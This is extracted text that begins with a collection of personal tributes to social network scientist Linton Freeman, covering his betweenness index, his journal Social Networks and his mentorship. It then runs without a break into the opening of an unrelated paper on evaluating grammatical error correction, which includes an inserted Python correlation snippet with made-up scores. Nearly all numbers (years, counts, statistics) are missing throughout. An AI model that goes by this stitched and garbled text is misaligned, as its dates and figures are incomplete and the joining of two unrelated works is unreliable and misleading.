discussing explanations with lin took me back to my undergraduate courses in the natural sciences. the touchstone work to which i often return is lin’s initial proposal for his “betweenness” index (about half of the thousand google cites to lin’s work are to his betweenness index – which indicates the importance of his index at the same time that it indicates lin is equally recognized for diverse works other than his index). in a issue of the american sociological association’s social network journal, sociometry, lin proposed a measure of the extent to which a person brokers connections between others (i.e., stands “be- tween” others). the proposal is simple, elegant, but connections (insna) lin goes on to show how his proposed index does a more consistent job of predicting in a classic study the key outcome for which a more familiar measure had been used (picture of steve borgatti). one would like to believe that routine practice involves simple argument combined with evidence of improved key prediction in comparison to prior measures. it is not routine. it is rare. most network measures are pro- posed in complicated text, with no more empirical ev- idence than numerical illustration of how to compute the measure. lin’s ( ) proposal is an exemplar to which i return from time to time when in need of an aspirational goal. i learned of lin’s death when his daughter, sta- cey, responded to an email message i sent to lin asking about a convenient time to visit. upon hearing the news, i stopped what i was doing and stared at my desk for a long while, my world a darker, colder place. he will forever walk with me a silent partner – likely telling me i could do better. a tribute to lin freeman pat doreian when thinking about lin, my thoughts follow three distinct but interlinked strands. the first centers on friendship. the second features issues related to the social organi- zation of research fields. the third strand concentrates on doing network research. i write about all three in this order while thinking about lin and his many contribu- tions to my life, the nature of the social networks field, and the brilliance of his academic contributions. friendship on a personal level, having lin as a close and great friend for such a long time enriched my life immense- ly. when lin formed friendships, he remained com- mitted to these relationships and provided constant support. i am sure many others have experienced this as well. but in writing about lin as a friend, it is impossi- ble to not fully include sue freeman. together, they formed a fine couple living a rich and full life. togeth- er, they provided a kind of role model worthy of em- ulation. esther and i rented apartments with them in paris on multiple occasions as well as a house on oahu in lin’s beloved hawaii. these were times of immense fun involving discussions about life – both social and regarding research issues, the places where we were, good food and fine wine. when lin did things, he went ‘all in’ when doing them. it did not matter if this was downhill skiing, wind surfing, or cooking. he excelled in all three – as well as in doing coherent and influential research. lin did not care much about dealing with finances or real estate, tasks sue handled with aplomb. they had a nice division of labor in organizing their lives. both were forceful individuals. as noted by others, lin had firm views and held them with passion. he could change his mind on an issue and hold firm to an op- posing view with equal vehemence. 
yet he would ar- gue his side with humor and grace. he could listen to other views without wanting to be dominant. despite his many accomplishments, i never saw any effort at self-aggrandizement on his part. social organization of the social network field others have noted that he founded social networks, the premier journal of the field, and edited it for a very long time. he had a clear vision for the role this jour- nal could play as a venue for publishing important work and how it could help to define our field. espe- cially important was the breadth of his commitment to encouraging interdisciplinary work across multi- ple fields. disciplinary departments tend to be insu- lar turf-protecting machines designed to keep within narrow definitions and strong exclusives impulses. lin would have none of this. put differently, he was catholic in encouraging multiple approaches and dif- ferent ways of doing research so long as it was rigor- ously defined within sound research designs. both lin and sue were socially active at the annual sunbelt social network conferences both in sessions and, more importantly, outside sessions when a lot of ideas are generated in free-flowing discussions about our field and potential future directions. i look back fondly at lin ‘holding court’ as these sunbelt gath- erings, especially as they grew larger. he would sit in some public area. others would be drawn to talk with him, learn from him, and enjoy his company. his creation of the nsf funded electronic infor- mation exchange system (eies) experiment with a gathering of researchers also helped define the emerging field. currently, we take for granted the free flow of information on the internet. but this experi- ment was in the early days of this form of commu- nication. even though we exchanged messages at an incredibly slow baud rate, we had a sense of the a collection of tributes to linton c. freeman future thanks to another aspect of lin’s vision of what could be done. lin’s contributions to the social network literature my idiosyncratic career path from mathematics to social science in england meant that my entry into the social network field had nothing to do with lin! indeed, in the late s i had not even heard of him. i was busy trying to generalize many of the theorems characteristic of the early work done at the university of michigan and associated with the work of frank harary and doc cartwright, among others. i did not meet lin until the eies gathering mentioned above. in many ways, i wished i had met him earlier. without doubt, some of his most influential, and highly cited, work dealt with centrality. others are bet- ter placed to comment further about his contributions in this realm. i was struck particularly by the clarity of his articulation of some different conceptions and for- mulations of this concept. until he brought such clar- ity, the concept had been rather fuzzy and was used sloppily. he was clear about the substantive mean- ing of these different concepts and the importance of selecting the one most appropriate measure given a specific research endeavor. i am sure that he would be appalled by the impulse of so many to compute a lot of centrality measures without thinking through the rationales for using them. here, i will focus on only two productions involv- ing lin. early on, norm hummon and i were develop- ing methods for citation networks that have become known within the rubric of ‘main path’ analysis. 
lin had collected the citation network for years of the centrality literature. with characteristic generosity, he gave us his data. we analyzed them and sent him a draft of a manuscript. he wrote a paragraph that led him to becoming a co-author. it was a (positively) so- bering experience for us. we had some neat results, but he transformed them with a deeper understand- ing of the broader context of this area. he turned a good paper into a very good paper and, critically, forced us to broaden our perspective. it was one of the most valuable lessons he taught us. no doubt, students fortunate enough to have had lin as one of their faculty members will have experienced many such learning experiences. the next study featuring lin and sue was about informant accuracy (or inaccuracy) developed by russ bernard, peter killworth, and, later, lee sailer. by questioning the quality of the typically collected network data, this line of research rattled many cag- es. while some responded with irritation or a sense of foreboding about collected social network data, lin responded in a typically deeper fashion. the design of lin and sue’s study was pure elegance. attend- ance data for a long running seminar at irvine were collected. following one session, with a time lapse, the participants were asked about who was there. of course, there were errors in the form of forget- ting some who were there and claims that some not attending on that occasion were there. by consid- ering the social organization of the seminar and the programs from participants came, both types of er- ror could be accounted for. it was another example of considering a broader context to understand the operation of social processes to generate deeper un- derstandings of social life. on the future my stating that i will miss lin and sue greatly counts as a total understatement. no doubt others will share this sentiment. the creation of the set of tributes in this volume testifies to this. the nature of our field was shaped indelibly by lin, in terms of his clear vi- sion as to what was possible for doing social network research, his ability to organize events critically im- portant for our field, and the great support he gave to so many of us. we must continue to do quality re- search for this is the only way forward for our field. perhaps more importantly, this work will be inspired by his acumen and a sense of standing on the shoul- ders of lin as a giant in the field. lin freeman is science elisa bienenstock in my mind and memory, lin freeman is science. when i think of lin, i think of the scientific method. not because i took research methods from lin, i did not. for me, lin personified the promise of science. my contact with lin was sporadic. when i met with him some things were constant, and others were not. there was a persistence of curiosity, energy, humor, kindness and generosity. what differed were the the- ories he passionately espoused about the way the world worked. at any point in time lin enthusiastically and emphatically would argue in support of a position on one or another topic (from coffee to methods), and then a short time later, i would find he had abandoned or updated that view. new data, new evidence, new measurement demanded an update. lin easily es- chewed that which “was not supported” by reason and data and revised his theory. lin had no conventional connections (insna) biases. he did not presume based on sex, race or any other “sociological” variable associated with personal characteristics. 
lin evaluated everything and everyone based on the data presented to him. not constrained in his search for knowledge, lin would seek out any data and master any method to answer a question or solve a puzzle that enticed him. this made lin the ide- al teacher, researcher and mentor. it was obvious that for lin science was not a vocation. lin lived, loved and embodied science. thoughts of lin evoke thoughts of the beauty and promise of science done right. for me, when i think “science,” i see lin. freeman dependency and distance ulrik brandes lin freeman was, quite liter- ally, a towering figure. while others are infinitely more qualified to give personal accounts of their interac- tions with him, for me he symbolizes my relationship with the social sciences. i was trained as a com- puter scientist and special- ized in algorithmics. as a doctoral student in the s, i regarded the social sciences in general, and lin’s contributions to the pe- culiar science of social networks in particular, as highly interesting but only mildly impressive. in the absence of deep mathematical concepts and challenging proofs, it seemed that a bit of extra reading and learning a few names and ideas would suffice to be able to contribute to the field of social networks like the pros. little did i know. in michael ende’s children’s book jim button and luke the engine driver, a mr. tur tur appears as a giant from afar and the closer you get the more he shrinks to what eventually is a rather normal person. the opposite was the case with lin and his work: to the contrary and to this day, he has grown bigger and bigger the closer i got to grasping where the issues even started. lin, i have come to realize, had thought through many of these issues, albeit decades ago. his appro- priation of mathematics was often ahead of its time, however, so that we have yet to give birth to ideas that in retrospect will turn out to be conceived already in his work. in a last article he saw published in the journal he founded and shaped, we, with steve borgatti, picked up on one such idea from a quarter of a century ago. while the associated paper has been cited fair- ly, i dare say rarely for its most important aspects, in- cluding by myself. two concepts involved in this work, an asymmetric dyadic relationship indicating the de- gree to which an actor depends on another to reach the rest of the network, and a closely related notion of distance in terms of the average number of intermedi- aries on shortest paths (think weighted networks!) are essential in linking two of the most important central- ity indices, betweenness, (which lin introduced) and closeness (for which he gave crucially distinct inter- pretations in terms of efficiency and independence). our conversations were confined to sunbelt and email but i will remember him as having an aura of unassuming depth and open-minded firmness. his approach to interdisciplinarity was not one of lectur- ing about the things he knew better. his rigor was of a different kind than is known to those trained in the exact sciences. it is thus easily underappreciated, and yet so much more convincing and inspiring when you admit of it. i will be grateful for the example he set, and my way to honor him will be to refer to the relations men- tioned above as freeman dependency and freeman distance. thoughts on the passing of linton freeman david krackhardt perhaps no one is more responsible for me pursuing a career in studying social net- works than lin free- man. 
the story of how i took up the challenge to use network analysis to study organizations is a bit strange, but ex- emplifies lin’s role in many of our lives. he was a true intellectu- al, one who thrived on discourse, even argu- ment, but with serious curiosity and respect. he didn’t suffer fools lightly, but he did engage, even when you might disagree with him. my background was organ- izational psychology; his interests lay in sociological explanations. my training emphasized applications, de- riving practical solutions to managerial problems. he preferred science for its own sake. he often told me that social science was not mature enough for us to be a collection of tributes to linton c. freeman making sound judgments or conclusions about com- plex organizational problems. social scientists should spend our efforts, he would say, focusing on sound and basic research into fundamental human behavior questions. applications were better left to consultants or other pretenders. despite these differences in per- spectives, he seemed to enjoy my company and our conversations about such issues. he never insisted that i adopt his view on these partisan topics; rather he seemed to thrive on the discussions because of these differences. i always felt respect from him, even liking, in spite of views that diverged from his, and despite the fact that i was clearly a kid just beginning in my chosen field and he was an established, eminent scholar in his. his support and guidance were key to my converting from a student of job attitudes to the study of social structure in organizations. my conversion was not gradual, but almost road to damascus-like, and it is due to both his kindness and intellectual enthusiasm. the particulars are re- vealing about lin as a scholar and as an inspirational leader in the field. by , i had spent four years in a phd program as a research assistant to lyman porter, a renowned organizational psychologist who published regularly in the most prestigious apa jour- nals. my dissertation proposal, fully supported and accepted by my committee, was to study attitude changes in junior auditors as they joined and were absorbed into one of the large professional auditing firms in southern california. there were eight big au- diting firms in the area i could choose from to study. one by one, however, they turned me down, until only arthur anderson was left. my contact at arthur an- derson, a senior partner at the local office, was en- thusiastic about my proposed study, saying that the firm could gain important insights into how they bring along young employees into the aa professional fold. i called my contact at arthur anderson to tell him that he was the winner that i had decided to go with their offer to study them. he then gave me the calamitous news: “david, our lawyers won’t let you come near our firm or our new employees to study them. appar- ently, there is too much liability assumed by the firm with such an arrangement.” i was devastated. my ca- reer plans, all my aspirations, my whole life went out the window with that phone call. the graduate school of management at irvine, where i was a student, occupied the rd floor of so- cial science tower. the top floors, floors - , con- tained the school of social sciences, which in those days was an interdisciplinary array of scholars with no departmental structure or affiliations. having just got off the phone with arthur anderson, i was in a sorry, depressed state. 
i entered the building on the ground floor, walked into the elevator, not sure what i was go- ing to tell porter, my advisor. for some reason, one that i cannot begin to recall, i failed to push the rd floor button on the elevator and instead pushed the button for the th floor. i don’t recall doing that; all i recall is that when i stepped off the elevator i was in unfamiliar surroundings, wondering where i was. no one was on the floor, except a tall gentleman with shocking-white hair, wearing sandals and a flowery short-sleeved shirt (it was january). he looked at me, probably noticing that i was lost and confused, and said kindly, “can i help you?” i had never met him be- fore, but i recognized him from pictures i had seen. he was the dean of social sciences, linton freeman. i was embarrassed. i didn’t know what to say in response to his question. i couldn’t just tell him, “oh, i’m sorry, i pushed the wrong button on the eleva- tor. i meant to go to the third floor.” so, instead, i just made something up on the spot. i said, “oh, i came to see you. someone told me i’d be interested in your research.” an avuncular smile came over him, and he invited me into his office (corner office, with a great view). he spent the next one and a half hours telling me stories about network analysis and how this per- spective is different than the one i was likely to have on social phenomena (he was right about that). at the end of that session, he suggested that i sit in on a phd and faculty seminar he and doug white were running together. he also mentioned that harrison white would be sitting in on the seminar, too. i had no idea who any of these people were, but i certainly had nothing better to do, so i decided to take him up on his offer. at the first day of the seminar, lin handed me a type-written carbon copy of a book manuscript. there was a magical twinkle in his eye when he said, “here, you’re an organizations person. this is a book written by a young sociologist who studies networks and organizations. your job is to read this manuscript and tell us what it says.” when you have to explain the contents of a new book to a room full of experts, you read the book very carefully. it was ron burt’s first book, toward a structural theory of action. chapter contained a succinct yet detailed history of various constructs in the field of social networks. chapter emphasized the importance of perceptions of networks. light bulbs went off as i read it. page af- ter page, i could see these ideas could be very useful in the field of organizational behavior. indeed, i came to see that almost everything we study in ob could be looked at anew through this network lens. more- over, there were questions that we had never even thought about asking that could be researched from this network perspective, questions that would give connections (insna) us new insights into the organizational phenomena that we care about in our overtly psychological field. i abandoned my old dissertation plans and developed a new proposal to study the effect of employee turn- over on attitude change in fast food restaurants as a function of the network structure in the restaurant. i’ve been doing social network studies in organiza- tions ever since. all because i pushed the wrong but- ton on the elevator. it has been nearly years, but i recall vividly many of the details in this story, especially lin’s words and that “magical twinkle” in his eye when he handed me ron’s book. 
did he know that this book would have such an effect on me and my career plans? i don’t know. what i do know is that he never stopped engaging me, inspiring me, comforting me in rocky times over the years. i will miss him, his challenges to my way of thinking, his support, his friendship. intellectual lineage: a grandson and a son reminisce john skvoretz and tom fararo a remembrance of linton clarke freeman in which, first, the grandson, john skvoretz, narrates how he came to be lin’s intellectual grandson and then the son, tom fararo, reminisces more expan- sively about lin’s deep influence on his life and career. the first time i met lin turned out to be extremely consequential for me, resulting in my becoming his intellectual grandson. i was a senior at lehigh uni- versity double majoring in mathematics and sociol- ogy. at the time the two disciplines were but vaguely linked in my mind. i liked math because its problems had answers in the back of the book and i like sociol- ogy because its problems had no answers anywhere in the book. that the two could be put together in something called mathematical sociology was as yet unknown to me. the occasion of lin’s visit was a colloquium. i think he was invited by james mcintosh, a former colleague at syracuse, and it may have been the ini- tial overture to his recruitment as chair of the lehigh department of social relations. in any event the talk he gave had as its theme how mathematics could be used to improve concepts and theories in sociology. the example i remember most vividly was based on residential segregation. lin proposed a method of measuring residential segregation that compared the observed boundary around a set of minority house- holds to the length of the boundary that would oc- cur by chance, that is by the random scattering of m minority households and m majority households over a stylized housing grid. the mathematics came in to calculate the expected length of the boundary and variation in that quantity due to chance. as i re- call what struck me the most was lin’s point that this approach not only served to measure segregation as commonly understood – when the observed bound- ary was significantly smaller than expected – but also its polar opposite, regimented integration, when the boundary was significantly larger than expected. so with a fired-up imagination i hung around af- ter the talk and spoke with lin, telling him about my background and my interests. he advised me to check out a young professor, tom fararo, at the uni- versity of pittsburgh to see about working with him for my graduate education. at the time i did not re- alize that lin was tom’s dissertation supervisor. so a friend and i took a day off and hitchhiked across pennsylvania on the pa turnpike, he to visit the phys- ics department at pitt and me to visit tom. well, long story short, i enrolled at pitt in and finished a dissertation under tom’s supervision seven years lat- er. and that is how in i became one of lin free- man’s intellectual grandchildren. and now the son, tom fararo, shares his memo- ries. i first met lin in . he was , an assistant professor in the department of sociology at syra- cuse university. i was , a graduate student at syra- cuse in a program leading to a degree called doctor of social science. unlike lin and john, i had not been an undergrad- uate major in sociology but in history and political sci- ence, with no background at all in research methods and statistics. 
nevertheless, looking for income in the upcoming summer of , i applied to be an assistant on a research project dealing with community power structure, a lively topic in both political science and soci- ology at that time. i was hired by lin – after a very pleas- ant interview – and worked closely with him not only that summer but for a number of years beyond that. a collection of tributes to linton c. freeman working with lin was a transformative experience. i had brought to the project an interest in the history and philosophy of science but now i was doing sci- ence. by mid-summer, lin made me an offer: switch to the sociology graduate program and continue to work with him as a research assistant. it was an easy decision to make and one that shaped the remainder of my academic life. in the following academic years - , lin taught a number of courses i attended. as a teach- er, he was a model of logical organization and clarity. about that time, he began work toward his book el- ementary applied statistics: for students in behav- ioral science. i believe i read and commented on a draft and years later, when i stepped in to replace the usual teacher of statistics at pitt, i adopted lin’s text. it was the only time i ever taught statistics during my career. it was a very gratifying experience both for me and for the students, thanks to the sophisticated and lucid way that lin presented the material. following his advice, i looked beyond the depart- ment of sociology for further research-relevant course work, in particular taking courses in the psychology department, including social psychology and some quantitative courses, in particular factor analysis be- cause lin had figured out a way for us to use it in the data analysis phase of the project. i also attended lin’s course on the use of computers in social sci- ence research. he and i spent many hours at the uni- versity computer center watching the flashing lights on an ibm , a bulky early desktop computer. eventually, as we concluded the data analysis, lin asked me to write a first draft of a paper to be sub- mitted to the american sociological review. it was quite an honor! i gave it my best and waited for his reaction. ouch! what happened to my draft? he had produced a completely new paper in his distinctive crisp style that covered all that was needed to receive strong referee reviews that led to publication in asr in , “locating leaders in local communities: a comparison of some alternative approaches.” nat- urally i was very pleased when he included me as a co-author, but all the credit goes to lin when i men- tion that the paper was quickly reprinted in at least seven compilations of papers in political sociology. the last that i know of appeared in . eventually i had to define and pursue a doctoral thesis project. there was an opportunity to draw upon the community power structure data and so to deal with a problem we had faced at the data analysis phase. namely, a great deal of our data was simi- lar to sociometric data and yet more complex. much of the analysis was done using factor analysis, later described in lin’s monograph patterns of local community leadership. at about that time, in late , anatol rapoport and william horvath published their pioneering paper “a study of a large sociogram” in behavioral sci- ence. in his book, the development of social network analysis: a study in the sociology of sci- ence, lin includes a short discussion of the syracuse project, nicely summarizing how it emerged (pp. - ). 
i think he is correct when he writes there that he “leaned on” me to use the rapoport model in my dissertation research. accordingly, during the summer of , after studying rapoport’s papers in the bulletin of mathe- matical biophysics, i wrote to him about my disserta- tion project (i can’t recall if i consulted lin before do- ing so, but it is likely that i did). rapoport shared with me some of his recent work, including a revision of the biased net model that he and horvath had con- structed in their study. the term “net” was used in the bulletin papers and “bias” referred to parameters that were proposed to explain departures from a random net model. the syracuse interviews had generated an enor- mous amount of relational data, but it was organized around participation in community decisions. my dissertation, therefore, had to be a compromise: i would apply a biased net model to the largest of these decision sociograms even though they were nowhere near as large as the sociogram analyzed by rapoport and horvath. nevertheless, rapoport encouraged me to go forward with the project, as did lin. when i presented lin with what i thought would be the first draft of the thesis, i expected to get back a manuscript with his critical remarks and questions throughout. i even wondered if he might suggest a complete revision. a week later, i was standing before him as he sat at his desk when he returned the man- uscript to me. i looked through it: no markings at all. “that’s it?” i recall asking with some trepidation as to what this meant. he gave me that big grin i remem- ber so well and chuckled. “defend it,” he said, enjoy- ing my own overwhelmed surprise. and i did. there is an acknowledgment statement in the preface to my dissertation that reads: “anatol rapoport provided me with the revised theory of biased nets before its publication. more than that, he encouraged me to proceed with this study and provided invaluable advice. indeed, in the ab- sence of personal correspondence with anatol rap- oport, this whole study would have collapsed. i owe him an intellectual debt of great magnitude, not only because of the theory and the correspondence, but connections (insna) because through his writings i caught a glimpse of what rapoport once called ‘disciplined imagination.’’’ but i didn’t forget the formative role that lin played. in that preface i also thanked lin for his “personal reinforcement, support, and teaching […]. it was he who taught me that if i were really in- terested in theory, then i had better get interested in mathematics. more than making it plausible, he made it possible by setting an example and by encouraging me to go forward with this particular research effort.” in , i wrote in the preface to my book mathe- matical sociology: “it is a pleasure to acknowledge the influence of linton freeman in shaping my sociological incli- nations. as my mentor during my graduate student days, he was an important source of my commitment to exact methods in social theory. my ideas about mathematical social science were formed and trans- formed under diverse influences. to name but a few [….] [here i mentioned rapoport, as well as philoso- phers patrick suppes and stephen toulmin, among others including sociologists jim coleman and har- rison white].” however, i made an error of judgment in not ask- ing lin to read a draft of that book. 
in retrospect, i think he would have suggested that i omit cer- tain materials not only to shorten the book but also to make space for the coverage of the rapoport- horvath model and my own later follow-up publica- tion (mentioned below). this is a negative instance of my theme: not drawing upon my connection to lin led to a less positive outcome than would have oc- curred with his advice. by the way, the insightful and influential paper by granovetter (“the strength of weak ties”) appeared in ajs that year ( ) but too late for me to know about when my book went to press. it also drew upon the rapoport-horvath paper. lin also created numerous intellectual opportunities for me during my graduate student days at syracuse. in the early years, all my support came from fellowships and research activity. then lin suggested that i do some teaching and spoke with the chairperson about it. despite his relatively junior rank, on this occasion and many others it was apparent to me that lin had considerable influence within the department. he was able to persuade the department’s senior members, including the chairperson, that i should be assigned certain specific courses of my own even though i had not even had any experience as a teaching assistant. thus, my earliest teaching focused on theory: an undergraduate course in sociological theory and an- other course for sociology majors called “the integra- tion seminar.” in the theory course, one of the texts i had students read was games, fights and debates by anatol rapoport and in the integration seminar one of the texts was the newly published types of formalization by joe berger and co-authors. both books were indicative of new developments in social science centering on formal models. lin was among the sociologists who recognized the importance of this frontier work in the social sciences. i recall that in one of lin’s courses he lec- tured on elementary set theory, finite probability the- ory and elementary matrix algebra. these mathemat- ical ideas were the key ingredients that were pulled together by john kemeny in his innovative textbooks with co-author laurie snell, starting with an introduc- tion to finite mathematics, which i believe was first published in . lin also drew upon his professional acquaintance network to open up career opportunities for me, in- cluding getting invitations to give talks, applying for and receiving funding for research, and another important act on his part, writing a strong recommendation re- garding my application for a post-doctoral fellowship. i’ll try to recall a little of each of these efforts on his part that helped to shape my career in sociology. i think it was late in that jim coleman invit- ed me to give a seminar on my dissertation work. he was at johns hopkins at the time and interested in rapoport’s work. indeed, he had written an exten- sive essay on it that appeared in in mathemat- ical thinking in the measurement of behavior (edited by herbert solomon). this little-cited essay should be recognized as part of the history of social network analysis. there was a similar invitation from peter rossi to talk about my thesis work at the university of chicago. at about the same time, i received an offer to re- main at syracuse as an assistant professor starting in the academic year - . perhaps this was an- other example of lin’s behind-the-scenes influence. however, i surmise that he must have been ambiva- lent about it. 
i know he suggested that i wait to take the best offer, which would be from johns hopkins or chicago, should either or both actually make an of- fer. however, the syracuse chairperson pressed me to decide while coleman and rossi both indicated that it was too early for them to decide among can- didates. thus, i accepted the position at syracuse. maybe i should add that i had a wife and two very young children so that prospective financial security was a factor in the decision. once it was clear that i would be a syracuse fac- ulty member in the academic year - , i began to think about getting support for a research project i had in mind. my prospective collaborator (morris a collection of tributes to linton c. freeman sunshine) and i applied for support for a study that would relate to the theory of differential association that was often cited at that time in regard to the ex- planation of juvenile delinquency. we planned to do a sociometric study of an entire local junior high school student population. lin was instrumental in speaking on our behalf to the director of the syracuse univer- sity youth development center. i think we each re- ceived an appointment as research associate at the center as well as support for conducting the study. from my point of view, the center’s support ena- bled a study of a large network and so a better fol- low-up to the rapoport-horvath paper than my disser- tation had been. at its conclusion, our research project led to a monograph on random and biased net theory and the empirical testing of a biased net model. a link to differential association theory also was included. sunshine and i called it a study of a biased friend- ship net. in the course of the formal work, i found a problem in rapoport’s most recent “tracing formula” that led me to devise and use a new formula. ironically, years later, john skvoretz found a problem in my for- mula, leading him to a series of formal and computa- tional studies in the theory of random and biased nets. gradually, amidst this teaching and research, i realized that the direction my academic activity was taking would require more than finite mathematics. i applied for a three-year post-doctoral fellowship for studies in pure mathematics and mathematical mod- els in the social sciences at stanford university. there is no doubt in my mind that lin’s recommendation strongly contributed to my getting the fellowship. thus, there was a match between what i wanted to do and what funding agencies were ready to support during that era. and what i wanted to do was at least in part the outcome of my extended interaction with lin since i first met him in . toward the end of that three-year period at stan- ford, i think lin was ready to leave syracuse. we had remained in contact and he had stopped by to visit my wife and i in palo alto at least once. his proposal was that we form a research group at the university of pittsburgh that would engage in teach- ing and research on the new intellectual frontier. this idea probably was sparked by an opportunity that existed at pitt at that time. namely, funds were made available by the university administration for departments that had a “vision” for what they could become in terms of stature. the sociology depart- ment chairperson at the time, burkart holzner, came up with a vision that was quite ambitious, involving hiring three research groups, each on the frontier of new developments in the field. i only recall two of these: historical sociology and what he called formal sociology. 
although not a formalist in his own work, holzner had taken note of the new developments that i mentioned earlier. thus, in , lin and i both joined the department, as did otomar bartos, who had just published a very nice textbook called sim- ple models of group behavior (one chapter deals with a dominance model, right out of the bulletin of mathematical biophysics). i wish i could say it all worked out beautifully. but it didn’t. maybe it was the late s turmoil. i don’t know. bartos left very soon. and lin spent only two years at pitt before moving on in , the same year that john skvoretz arrived to join the graduate pro- gram – through lin’s influence. i remained at pitt for my entire career and john would eventually become my frequent collaborator. farewell to lin freeman, my mentor and more! social scientist extraordinaire! reassessing the goals of grammatical error correction: fluency instead of grammaticality keisuke sakaguchi , courtney napoles , matt post , and joel tetreault center for language and speech processing, johns hopkins university human language technology center of excellence, johns hopkins university yahoo {keisuke,napoles,post}@cs.jhu.edu, tetreaul@yahoo-inc.com abstract the field of grammatical error correction (gec) has grown substantially in recent years, with research directed at both evaluation met- rics and improved system performance against those metrics. one unvisited assumption, however, is the reliance of gec evaluation on error-coded corpora, which contain spe- cific labeled corrections. we examine cur- rent practices and show that gec’s reliance on such corpora unnaturally constrains annota- tion and automatic evaluation, resulting in (a) sentences that do not sound acceptable to na- tive speakers and (b) system rankings that do not correlate with human judgments. in light of this, we propose an alternate approach that jettisons costly error coding in favor of unan- notated, whole-sentence rewrites. we com- pare the performance of existing metrics over different gold-standard annotations, and show that automatic evaluation with our new anno- tation scheme has very strong correlation with expert rankings (ρ = . ). as a result, we ad- vocate for a fundamental and necessary shift in the goal of gec, from correcting small, la- beled error types, to producing text that has native fluency. introduction what is the purpose of grammatical error correction (gec)? one response is that gec aims to help peo- ple become better writers by correcting grammatical mistakes in their writing. in the nlp community, the original scope of gec was correcting targeted error types with the goal of providing feedback to non-native writers (chodorow and leacock, ; dale and kilgarriff, ; leacock et al., ). as systems improved and more advanced methods were applied to the task, the definition evolved to whole- sentence correction, or correcting all errors of every error type (ng et al., ). with this pivot, we urge the community to revisit the original question. it is often the case that writing exhibits problems that are difficult to ascribe to specific grammatical categories. consider the following example: original: from this scope , social media has shorten our distance . corrected: from this scope , social media has shortened our distance . if the goal is to correct verb errors, the grammat- ical mistake in the original sentence has been ad- dressed and we can move on. however, when we aim to correct the sentence as a whole, a more vex- ing problem remains. 
the more prominent error has to do with how unnaturally this sentence reads. the meanings of words and phrases like scope and the corrected shortened our distance are clear, but this is not how a native english speaker would use them. a more fluent version of this sentence would be the following: fluent: from this perspective , social media has shortened the distance between us . this issue argues for a broader definition of gram- maticality that we will term native-language flu- ency, or simply fluency. one can argue that tradi- tional understanding of grammar and grammar cor- rection encompasses the idea of native-language flu- ency. however, the metrics commonly used in eval- uating gec undermine these arguments. the per- formance of gec systems is typically evaluated us- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ing metrics that compute corrections against error- coded corpora, which impose a taxonomy of types of grammatical errors. assigning these codes can be difficult, as evidenced by the low agreement found between annotators of these corpora. it is also quite expensive. but most importantly, as we will show in this paper, annotating for explicit error codes places a downward pressure on annotators to find and fix concrete, easily-identifiable grammatical er- rors (such as wrong verb tense) in lieu of addressing the native fluency of the text. a related problem is the presence of multiple evaluation metrics computed over error-annotated corpora. recent work has shown that metrics like m and i-measure, both of which require error- coded corpora, produce dramatically different re- sults when used to score system output and produce a ranking of systems in conventional competitions (felice and briscoe, ). in light of all of this, we suggest that the gec task has overlooked a fundamental question: what are the best practices for corpus annotation and system evaluation? this work attempts to answer this ques- tion. we show that native speakers prefer text that exhibits fluent sentences over ones that have only minimal grammatical corrections. we explore dif- ferent methods for corpus annotation (with and with- out error codes, written by experts and non-experts) and different evaluation metrics to determine which configuration of annotated corpus and metric has the strongest correlation with the human ranking. in so doing, we establish a reliable and replicable evalu- ation procedure to help further the advancement of gec methods. to date, this is the only work to un- dertake a comprehensive empirical study of annota- tion and evaluation. as we will show, the two areas are intimately related. fundamentally, this work reframes grammati- cal error correction as a fluency task. our pro- posed evaluation framework produces system rank- ings with strong to very strong correlations with hu- man judgments (spearman’s ρ = . , pearson’s r = . ), using a variation of the gleu metric (napoles et al., ) and two sets of “fluent” sen- all the scripts and new data we collected are available at https://github.com/keisks/reassess-gec. this metric should not be confused with the method of the same name presented in mutton et al. ( ) for sentence-level tence rewrites as a gold standard, which are simpler and cheaper to collect than previous annotations. 
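the evaluation framework proposed here is judged by how closely a metric's system-level scores track an expert human ranking, measured with spearman's ρ and pearson's r. as a rough illustration of that comparison step (this is not taken from the paper's released scripts; the system names and scores below are invented for demonstration), a short python sketch:

```python
# illustrative sketch: comparing a metric-induced system ranking against a
# human ranking with the two correlation statistics used in this paper.
# system names and numbers are made up for demonstration only.
from scipy.stats import spearmanr, pearsonr

metric_scores = {"sysA": 0.62, "sysB": 0.55, "sysC": 0.48, "sysD": 0.71, "sysE": 0.33}
human_scores  = {"sysA": 0.40, "sysB": 0.22, "sysC": 0.05, "sysD": 0.63, "sysE": -0.18}

systems = sorted(metric_scores)                 # fix a common ordering of systems
x = [metric_scores[s] for s in systems]
y = [human_scores[s] for s in systems]

rho, _ = spearmanr(x, y)   # rank correlation: do the two rankings order systems alike?
r, _ = pearsonr(x, y)      # linear correlation of the raw scores
print(f"spearman rho = {rho:.3f}, pearson r = {r:.3f}")
```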
current issues in gec in this section, we will address issues of the gec task, reviewing previous work with respect to error annotation and evaluation metrics. . annotation methodologies existing corpora for gec are annotated for er- rors using fine-grained coding schemes. to create error-coded corpora, trained annotators must iden- tify spans of text containing an error, assign codes corresponding to the error type, and provide correc- tions to those spans for each error in the sentence. one of the main issues with coded annotation schemes is the difficulty of defining the granularity of error types. these sets of error tags are not easily interchangeable between different corpora. specif- ically, two major gec corpora have different tax- onomies: the cambridge learner corpus (clc) (nicholls, ) has tags, which generally repre- sent the word class of the error and the type of error (such as replace preposition, unnecessary pronoun, or missing determiner). in contrast, the nus cor- pus of learner english (nucle) (dahlmeier et al., ) has only error types. a direct conversion between them, if possible, would be very complex. additionally, it is difficult for annotators to agree on error annotations, which complicates the annotation validity as a gold standard (leacock et al., ). this is due to the nature of grammatical error cor- rection, where there can be diverse correct edits for a sentence (figure ). in other words, there is no single gold-standard correction. the variety of error types and potential correct edits result in very low inter-annotator agreement (iaa), as reported in pre- vious studies (tetreault and chodorow, ; ro- zovskaya and roth, ; bryant and ng, ). this leads to a more fundamental question: why do we depend so much on fine-grained, low- consensus error-type annotations as a gold standard for evaluating gec systems? one answer is that error tags can be informative and useful to provide feedback to language learn- ers, especially for specific closed-class error types fluency evaluation. https://github.com/keisks/reassess-gec as the development of the technology , social media becomes more and more significant role in the whole world . with the development of technology as the technology develops as technology develops plays a more and more significant role becomes more and more significant world figure : an ungrammatical sentence that can be corrected in different ways. (such as determiners and prepositions). indeed, the clc, the first large-scale corpus of annotated gram- matical errors, was coded specifically with the intent of gathering statistics about errors to inform the de- velopment of tools to help english language learn- ers (nicholls, ). later gec corpora adhered to the same error-coding template, if not the same error types (rozovskaya and roth, ; yannakoudakis et al., ; 